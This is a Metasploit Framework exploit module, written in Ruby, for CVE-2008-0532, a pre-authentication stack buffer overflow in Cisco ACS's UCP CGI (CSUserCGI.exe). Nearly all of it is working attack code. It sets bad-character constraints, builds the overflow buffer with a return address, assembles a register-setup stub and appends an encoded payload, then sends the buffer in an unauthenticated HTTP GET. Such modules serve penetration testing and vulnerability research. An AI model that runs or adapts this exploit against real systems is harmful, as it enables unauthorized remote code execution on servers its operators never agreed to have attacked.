##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

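# Metasploit exploit module for CVE-2008-0532: a pre-authentication stack
# buffer overflow in CSUserCGI.exe, the UCP (User Changeable Password) CGI
# shipped with Cisco ACS. The module sends one unauthenticated HTTP GET to
# /securecgi-bin/CSUserCGI.exe whose query string starts with "Logout+" and
# carries the overflow buffer; ACS/UCP versions prior to 4.2 are affected.
class MetasploitModule < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	# Registers the module metadata (name, authors, references, payload
	# constraints, target) and the RPORT option (default 80).
	#
	# @param info [Hash] module info merged via update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Cisco ACS 4.1 with UCP enabled pre-authentication buffer overflow',
			'Description'    => %q{
						This module exploits a stack buffer overflow in CSUserCGI.exe which
					is Cisco's UCP CGI script for allowing users to change their passwords
					through ACS. The CGI /securecgi-bin/CSUserCGI.exe suffers from multiple buffer
					overflows exploitable remotely through the HTTP protocol before authentication.

					ACS/UCP versions prior to 4.2 are affected.
			},
			'Author'         =>
				[
					'Felix FX Lindner', # original discovery, poc
					'Lincoln'           # metasploit
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					# Each reference is a [type, value] pair. The Cisco advisory entry
					# was missing its 'URL' type tag, so the framework could not
					# build a reference from it and the advisory link was lost.
					['CVE', '2008-0532'],
					['URL', 'http://www.securityfocus.com/archive/1/489463'],
					['URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080312-ucp']
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					# Bytes the payload encoder must avoid: 0x00-0x20 (control
					# characters and space), '+', ';', '~', DEL, and 0x80-0xff.
					'BadChars'       => [*(0x00..0x20)].pack("C*") + [0x2b, 0x3b, 0x7e, 0x7f].pack("C*") + [*(0x80..0xff)].pack("C*"),
					'EncoderOptions' =>
						{
							# The stub assembled in #exploit leaves EDX pointing at the
							# payload, so the encoder is told to use EDX as its buffer register.
							'BufferRegister' => 'EDX'
						}
				},
			'Platform'       => 'win',
			'Privileged'     => false,
			'Targets'        =>
				[
					# custom p/p/r taking advantage of null from CSUserCGI.exe
					[ 'Windows 2003 SP0 Eng', { 'Ret' => 0x414a7042, }]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Mar 03 2008'))

		register_options(
			[
				Opt::RPORT(80)
			], self.class )
	end

	# Builds the overflow buffer, sends it in a single GET request and then
	# hands control to the payload handler.
	#
	# Buffer layout, in order: a two-byte prefix, 92 bytes of alpha filler,
	# target.ret packed little-endian, a '+' (acts as a null), 27 bytes of
	# filler, the two-instruction stub below, the bytes 66 81 c2 ac, another
	# '+', the bytes eb 24, 36 bytes of filler, and the encoded payload.
	def exploit
		# Two-instruction stub (`push esi` / `pop edx`) assembled at run time
		# with Metasm. The literal is kept verbatim; leading whitespace is
		# ignored by the assembler.
		stub_asm = %Q|
	push esi
	pop edx
|
		stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

		buffer = "\x7a\x7c"
		buffer << rand_text_alpha(92)
		buffer << [target.ret].pack('V') # 32-bit little-endian
		buffer << "+"                    # act as null
		buffer << rand_text_alpha(27)
		buffer << stub
		buffer << "\x66\x81\xc2\xac"
		buffer << "+"                    # act as null
		buffer << "\xeb\x24"
		buffer << rand_text_alpha(36)
		buffer << payload.encoded

		print_status("Sending HTTP request")
		# 25 is the response timeout in seconds. The response is deliberately
		# not inspected; presumably the CGI does not answer once overflowed.
		send_request_cgi({
			'uri'    => '/securecgi-bin/CSUserCGI.exe?Logout+' + buffer,
			'method' => 'GET'
		}, 25)

		disconnect
		handler
	end
end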
